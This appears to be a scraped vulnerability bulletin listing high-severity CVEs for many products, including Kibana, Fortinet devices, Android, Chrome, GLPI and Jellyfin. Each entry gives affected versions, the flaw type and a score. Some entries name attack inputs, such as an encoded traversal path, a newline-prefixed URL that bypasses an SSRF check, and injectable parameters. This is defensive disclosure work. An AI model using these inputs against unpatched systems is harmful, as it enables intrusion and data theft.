cve@mitre.org
eclipse — memory_analyzer In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition. 2023-12-11 7.1 CVE-2023-6194
emo@eclipse.org
emo@eclipse.org
emo@eclipse.org
elastic — kibana An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error. Elastic has released Kibana 8.11.1 which resolves this issue. The error message recorded in the log may contain account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users. The issue occurs infrequently, only if an error is returned from an Elasticsearch cluster, in cases where there is user interaction and an unhealthy cluster (for example, when returning circuit breaker or no shard exceptions). 2023-12-13 8 CVE-2023-46671
bressers@elastic.co
elastic — kibana An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error or in the event where debug level logging is enabled in Kibana. Elastic has released Kibana 8.11.2 which resolves this issue. The messages recorded in the log may contain Account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users, Elastic Security package policy objects which can contain private keys, bearer token, and sessions of 3rd-party integrations and finally Authorization headers, client secrets, local file paths, and stack traces. The issue may occur in any Kibana instance running an affected version that could potentially receive an unexpected error when communicating to Elasticsearch causing it to include sensitive data into Kibana error logs. It could also occur under specific circumstances when debug level logging is enabled in Kibana. Note: It was found that the fix for ESA-2023-25 in Kibana 8.11.1 for a similar issue was incomplete. 2023-12-13 8 CVE-2023-46675
bressers@elastic.co
elegant_digital_solutions — commentluv Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv.This issue affects CommentLuv: from n/a through 3.0.4. 2023-12-15 7.2 CVE-2023-49159
audit@patchstack.com
emlog — emlog Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php. 2023-12-12 7.2 CVE-2023-41623
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contain packages, standalone packages, and functions that run SECURITY DEFINER but are inadequately secured against search_path attacks. 2023-12-12 9.8 CVE-2023-41117
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It may allow an authenticated user to bypass authorization requirements and access underlying implementation functions. When a superuser has configured file locations using CREATE DIRECTORY, these functions allow users to take a wide range of actions, including read, write, copy, rename, and delete. 2023-12-12 8.8 CVE-2023-41118
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the function _dbms_aq_move_to_exception_queue that may be used to elevate a user’s privileges to superuser. This function accepts the OID of a table, and then accesses that table as the superuser by using SELECT and DML commands. 2023-12-12 8.8 CVE-2023-41119
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a buffer-overflow via the function SetUpPhonemeTable at synthdata.c. 2023-12-12 7.8 CVE-2023-49990
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Underflow via the function CountVowelPosition at synthdata.c. 2023-12-12 7.8 CVE-2023-49991
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c. 2023-12-12 7.8 CVE-2023-49992
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Buffer Overflow via the function ReadClause at readclause.c. 2023-12-12 7.8 CVE-2023-49993
cve@mitre.org
evershop — evershop An issue in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information and execute arbitrary code via the /deleteCustomer/route.json file. 2023-12-08 9.8 CVE-2023-46498
cve@mitre.org
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the DELETE function in api/files endpoint. 2023-12-08 8.3 CVE-2023-46496
cve@mitre.org
cve@mitre.org
fortinet — fortios A double free in Fortinet FortiOS versions 7.0.0 through 7.0.5, FortiPAM version 1.0.0 through 1.0.3, 1.1.0 through 1.1.1 allows attacker to execute unauthorized code or commands via specifically crafted request. 2023-12-13 8.8 CVE-2023-41678
psirt@fortinet.com
fortinet — fortiportal An improper neutralization of special elements used in a command (‘Command Injection’) vulnerability [CWE-77] in FortiPortal version 7.2.0, version 7.0.6 and below may allow a remote authenticated attacker with at least R/W permission to execute unauthorized commands via specifically crafted arguments in the Schedule System Backup page field. 2023-12-13 8.8 CVE-2023-48791
psirt@fortinet.com
fortinet — fortiproxy A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, FortiOS versions 7.4.0, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiPAM versions 1.0.0 through 1.0.3 allows attacker to execute unauthorized code or commands via specially crafted API requests. 2023-12-13 8.8 CVE-2023-36639
psirt@fortinet.com
fortinet — fortitester An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the command line interpreter of FortiTester 2.3.0 through 7.2.3 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments when running execute restore/backup . 2023-12-13 7.8 CVE-2023-40716
psirt@fortinet.com
fortinet — fortiwlm A improper neutralization of special elements used in an os command (‘os command injection’) in Fortinet FortiWLM version 8.6.0 through 8.6.5 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters 2023-12-13 8.8 CVE-2023-48782
psirt@fortinet.com
fortinet — multiple_products
 		 A cross-site request forgery (CSRF) in Fortinet FortiVoiceEnterprise version 6.4.x, 6.0.x, FortiSwitch version 7.0.0 through 7.0.4, 6.4.0 through 6.4.10, 6.2.0 through 6.2.7, 6.0.x, FortiMail version 7.0.0 through 7.0.3, 6.4.0 through 6.4.6, 6.2.x, 6.0.x FortiRecorder version 6.4.0 through 6.4.2, 6.0.x, 2.7.x, 2.6.x, FortiNDR version 1.x.x allows a remote unauthenticated attacker to execute commands on the CLI via tricking an authenticated administrator to execute malicious GET requests. 2023-12-13 8.3 CVE-2022-27488
psirt@fortinet.com
franklin-electric — system_sentinel_anyware Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Session Fixation. The ‘sid’ parameter in the group_status.asp resource allows an attacker to escalate privileges and obtain sensitive information. 2023-12-08 9.8 CVE-2023-48929
cve@mitre.org
frauscher — frauscher_diagnostic_system_102 This vulnerability allows an remote attacker with low privileges to misuse Improper Control of Generation of Code (‘Code Injection’) to gain full control of the affected device. 2023-12-11 8.8 CVE-2023-5500
info@cert.vde.com
gitlab — gitlab An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. 2023-12-15 7.4 CVE-2023-6680
cve@gitlab.com
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality. 2023-12-12 9.8 CVE-2023-46454
cve@mitre.org
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware 3.216 it is possible to inject arbitrary shell commands through the OpenVPN client file upload functionality. 2023-12-12 9.8 CVE-2023-46456
cve@mitre.org
cve@mitre.org
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware v4.3.7 it is possible to write arbitrary files through a path traversal attack in the OpenVPN client file upload functionality. 2023-12-12 7.5 CVE-2023-46455
cve@mitre.org
cve@mitre.org
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, GLPI inventory endpoint can be used to drive a SQL injection attack. Version 10.0.11 contains a patch for the issue. As a workaround, disable native inventory. 2023-12-13 8.6 CVE-2023-46727
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, on PHP 7.4 only, the LDAP server configuration form can be used to execute arbitrary code previously uploaded as a GLPI document. Version 10.0.11 contains a patch for the issue. 2023-12-13 7.2 CVE-2023-46726
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
google — android In dhcp4_SetPDNAddress of dhcp4_Main.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 9.8 CVE-2023-48423
dsap-vuln-management@google.com
google — android Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue. 2023-12-08 8.8 CVE-2023-45866
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
google — android In ProtocolNetAcBarringInfo::ProtocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48398
dsap-vuln-management@google.com
google — android In ppcfw_enable of ppcfw.c, there is a possible EoP due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48402
dsap-vuln-management@google.com
google — android In sms_DecodeCodedTpMsg of sms_PduCodec.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure if the attacker is able to observe the behavior of the subsequent switch conditional with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48403
dsap-vuln-management@google.com
google — android In ProtocolMiscCarrierConfigSimInfoIndAdapter of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48404
dsap-vuln-management@google.com
google — android there is a possible DCK won’t be deleted after factory reset due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48407
dsap-vuln-management@google.com
google — android In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48409
dsap-vuln-management@google.com
google — android In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48410
dsap-vuln-management@google.com
google — android In multiple locations, there is a possible null dereference due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48416
dsap-vuln-management@google.com
google — android In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/platform/pixel/pixel_gpu_slc.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48421
dsap-vuln-management@google.com
google — chrome Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6702
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in Blink in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6703
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in libavif in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted image file. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6704
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in WebRTC in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6705
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in FedCM in Google Chrome prior to 120.0.6099.109 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6706
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in CSS in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) 2023-12-14 8.8 CVE-2023-6707
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chromecast_firmware Missing Permission checks resulting in unauthorized access and Manipulation in KeyChainActivity Application 2023-12-11 9.8 CVE-2023-48417
dsap-vuln-management@google.com
google — chromecast_firmware U-Boot shell vulnerability resulting in Privilege escalation in a production device 2023-12-11 9.8 CVE-2023-48424
dsap-vuln-management@google.com
google — chromecast_firmware U-Boot vulnerability resulting in persistent Code Execution  2023-12-11 9.8 CVE-2023-48425
dsap-vuln-management@google.com
google — chromecast_firmware An oversight in BCB handling of reboot reason that allows for persistent code execution 2023-12-11 9.8 CVE-2023-6181
dsap-vuln-management@google.com
gpac — gpac Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box. 2023-12-09 9.8 CVE-2023-46932
cve@mitre.org
hanbiro — groupware Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hanbiro Hanbiro groupware allows Information Elicitation.This issue affects Hanbiro groupware: from V3.8.79 before V3.8.81.1. 2023-12-13 7.5 CVE-2023-45800
vuln@krcert.or.kr
hapifhir — hl7_fhir_core The package-decompression feature in HL7 (Health Level 7) FHIR Core Libraries before 5.6.106 allows attackers to copy arbitrary files to certain directories via directory traversal, if an allowed directory name is a substring of the directory name chosen by the attacker. NOTE: this issue exists because of an incomplete fix for CVE-2023-24057. 2023-12-12 7.5 CVE-2023-28465
cve@mitre.org
cve@mitre.org
cve@mitre.org
hashicorp — vault HashiCorp Vault and Vault Enterprise 1.12.0 and newer are vulnerable to a denial of service through memory exhaustion of the host when handling large unauthenticated and authenticated HTTP requests from a client. Vault will attempt to map the request to memory, resulting in the exhaustion of available memory on the host, which may cause Vault to crash. Fixed in Vault 1.15.4, 1.14.8, 1.13.12. 2023-12-08 7.5 CVE-2023-6337
security@hashicorp.com
heartcombo — devise The Devise gem before 3.5.4 for Ruby mishandles Remember Me cookies for sessions, which may allow an adversary to obtain unauthorized persistent application access. 2023-12-12 7.5 CVE-2015-8314
cve@mitre.org
cve@mitre.org
cve@mitre.org
hitachi_vantara — pentaho_data_integration_&_analytics Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources. 2023-12-12 8.5 CVE-2023-3517
security.vulnerabilities@hitachivantara.com
hrp2000 — e-hr A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6655
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
html-js — doracms DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack. 2023-12-08 9.8 CVE-2023-49443
cve@mitre.org
huawei — ar617vw_firmware An improper access control vulnerability exists in a Huawei datacom product. Attackers can exploit this vulnerability to obtain partial device information. 2023-12-12 7.1 CVE-2022-48615
psirt@huawei.com
huawei — ar617vw_firmware A Huawei data communication product has a command injection vulnerability. Successful exploitation of this vulnerability may allow attackers to gain higher privileges. 2023-12-12 7.5 CVE-2022-48616
psirt@huawei.com
hyland — alfresco_content_services An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873. 2023-12-11 8.8 CVE-2023-49964
cve@mitre.org
cve@mitre.org
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964. 2023-12-13 8.4 CVE-2023-45166
psirt@us.ibm.com
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piobe command to escalate privileges or cause a denial of service. IBM X-Force ID: 267968. 2023-12-13 8.4 CVE-2023-45170
psirt@us.ibm.com
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972. 2023-12-13 8.4 CVE-2023-45174
psirt@us.ibm.com
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265. 2023-12-14 7.4 CVE-2023-45182
psirt@us.ibm.com
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user’s authority. IBM X-Force ID: 268273. 2023-12-14 7.4 CVE-2023-45185
psirt@us.ibm.com
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 onsmsync is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 250753. 2023-12-09 7.8 CVE-2023-28523
psirt@us.ibm.com
psirt@us.ibm.com
ibm — storage_virtualize IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user. IBM X-Force ID: 266874. 2023-12-14 7.5 CVE-2023-43042
psirt@us.ibm.com
psirt@us.ibm.com
iconics — iconics_suite Multiple components of Iconics SCADA Suite are prone to a Phantom DLL loading vulnerability. This issue arises from the applications improperly searching for and loading dynamic link libraries, potentially allowing an attacker to execute malicious code via a DLL with a matching name in an accessible search path. The affected components are: * MMXFax.exe * winfax.dll * MelSim2ComProc.exe * Sim2ComProc.dll * MMXCall_in.exe * libdxxmt.dll * libsrlmt.dll 2023-12-08 7.8 CVE-2023-6061
psirt@paloaltonetworks.com
idemia — sigma_lite_&_lite_+ The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device. 2023-12-15 9.1 CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ The handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.1 CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ During the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.1 CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it’s possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer 2023-12-15 7.5 CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imsurajghosh — student_information_system Student Information System v1.0 is vulnerable to an unauthenticated SQL Injection vulnerability on the ‘regno’ parameter of index.php page, allowing an external attacker to dump all the contents of the database contents and bypass the login control. 2023-12-08 9.8 CVE-2023-5008
help@fluidattacks.com
help@fluidattacks.com
invisible-island — ncurse NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry(). 2023-12-12 7.5 CVE-2023-50495
cve@mitre.org
cve@mitre.org
itpison — omicard_edm ITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. 2023-12-15 9.8 CVE-2023-48371
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM ‘s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48372
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48373
twcert@cert.org.tw
izybat — orange_casiers IzyBat Orange casiers before 20230803_1 allows getEnsemble.php ensemble SQL injection. 2023-12-09 9.1 CVE-2023-50429
cve@mitre.org
jellyfin — jellyfin Jellyfin is a system for managing and streaming media. Prior to version 10.8.13, the `/System/MediaEncoder/Path` endpoint executes an arbitrary file using `ProcessStartInfo` via the `ValidateVersion` function. A malicious administrator can setup a network share and supply a UNC path to `/System/MediaEncoder/Path` which points to an executable on the network share, causing Jellyfin server to run the executable in the local context. The endpoint was removed in version 10.8.13. 2023-12-13 7.2 CVE-2023-48702
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
jfinalcms_project — jfinalcms JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter. 2023-12-10 7.5 CVE-2023-50449
cve@mitre.org
johannschopplich — nuxt_api_party `nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. “To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.”. This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previous method of detecting absolute URLs. 2023-12-09 7.5 CVE-2023-49799
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
johannschopplich — nuxt_api_party `nuxt-api-party` is an open source module to proxy API requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. fetchOptions are obtained directly from the request body. A malicious user can construct a URL known to not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively resulting in a denial of service. This issue has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should limit ofetch options. 2023-12-09 7.5 CVE-2023-49800
security-advisories@github.com
jqlang — jq decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the ” []-1.2e-1111111111″ input. 2023-12-11 7.5 CVE-2023-49355
cve@mitre.org
cve@mitre.org
cve@mitre.org
jruby — jruby-openssl The jruby-openssl gem before 0.6 for JRuby mishandles SSL certificate validation. 2023-12-12 7.5 CVE-2009-4123
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in FTP service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-41963
vultures@jpcert.or.jp
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in commplex-link service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49140
vultures@jpcert.or.jp
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in rfe service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49143
vultures@jpcert.or.jp
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in NetBIOS service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49713
vultures@jpcert.or.jp
vultures@jpcert.or.jp
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information. 2023-12-15 9.8 CVE-2023-48392
twcert@cert.org.tw
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 8.8 CVE-2023-48394
twcert@cert.org.tw
kalcaddle — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. 2023-12-16 7.3 CVE-2023-6848
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kalcaddle — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. 2023-12-16 7.3 CVE-2023-6849
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
keycloak — keycloak An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (> 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the “consents” tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system. 2023-12-14 7.7 CVE-2023-6563
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
koajs — cross-origin_resource_sharing_for_koa @koa/cors npm provides Cross-Origin Resource Sharing (CORS) for koa, a web framework for Node.js. Prior to version 5.0.0, the middleware operates in a way that if an allowed origin is not provided, it will return an `Access-Control-Allow-Origin` header with the value of the origin from the request. This behavior completely disables one of the most crucial elements of browsers – the Same Origin Policy (SOP), this could cause a very serious security threat to the users of this middleware. If such behavior is expected, for instance, when middleware is used exclusively for prototypes and not for production applications, it should be heavily emphasized in the documentation along with an indication of the risks associated with such behavior, as many users may not be aware of it. Version 5.0.0 fixes this vulnerability. 2023-12-11 7.5 CVE-2023-49803
security-advisories@github.com
security-advisories@github.com
labring — laf Laf is a cloud development platform. Prior to version 1.0.0-beta.13, the control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in secret and configmap. In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact. When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here. Sensitive information in the secret and configmap can be read through the k8s envFrom field. In a privatization environment, when `namespaceConf. fixed` is marked, it may lead to the leakage of sensitive information in the system. As of time of publication, it is unclear whether any patches or workarounds exist. 2023-12-12 8.9 CVE-2023-48225
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
